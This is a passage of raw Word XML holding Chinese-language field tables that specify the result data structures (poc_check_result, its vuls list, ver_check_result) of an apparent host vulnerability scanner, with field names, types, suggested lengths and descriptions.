            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F11471B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cve_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40A23DD2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="623F96AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc_check_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C841376" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31EB5A94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CFEA8E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC检测结果，见</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>poc_check_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41F4B5F0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B2A78F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>host_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="176F166A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BBB97F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C1555E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="673CE200" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F49A44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ver_check_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39CF19FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5924DF57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7699040A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">版本比对检测结果，见 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ver_check_result</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>数据结构</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25B70945" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="751"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6890"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4674C02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9EB6BC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57930869" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EB690DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CE05DA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13D85712" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07FD84B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23D86E4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="410BED9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A78CFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0 表示不受影响，1表示受影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32EDEC57" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D9117DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="724D8C2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2407B1EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5641BC9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行状态的状态码, 0表示成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="78F0E999" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C909181" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012B0225" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vuls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FDF7B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F15231D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结果详情数组，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vuls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下是一个Map组成的list，用于渲染检测结果模板，各个检测项返回的结果包含的字段不同</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B859BCE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3E7929" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70BAE6FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3C9AF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29116612" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行错误时错误描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FB6EA73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>poc_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vuls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据结构--常见字段</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1032"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4806"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C3D2EB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74D3BF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4901FB59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C145AE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F01407" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34E3524E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22367BC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F372B7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="228BCB47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6802221B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>该检查项在脚本中的排序id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AC6DD64" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD954C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F9612FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B632C54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A88A1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否受漏洞影响，1或true表示受漏洞影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58C48A73" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2805EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulnmsg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C77D1E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBB5F7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E4ADB1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测结果从内存得到的内容，msg中包含的木板变量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BF7E876" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07005059" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>msg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32170F65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39B65DD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="243B249A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回的人类可读结构，可读的检测结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BE4A174" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409DB967" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DDE89A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D5367FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63C94839" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测点标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D12A473" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ver_check_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="751"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="4630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6FAFED0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F3BAA4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F00C2E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4218F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21C3CD83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F46774F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B245E70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
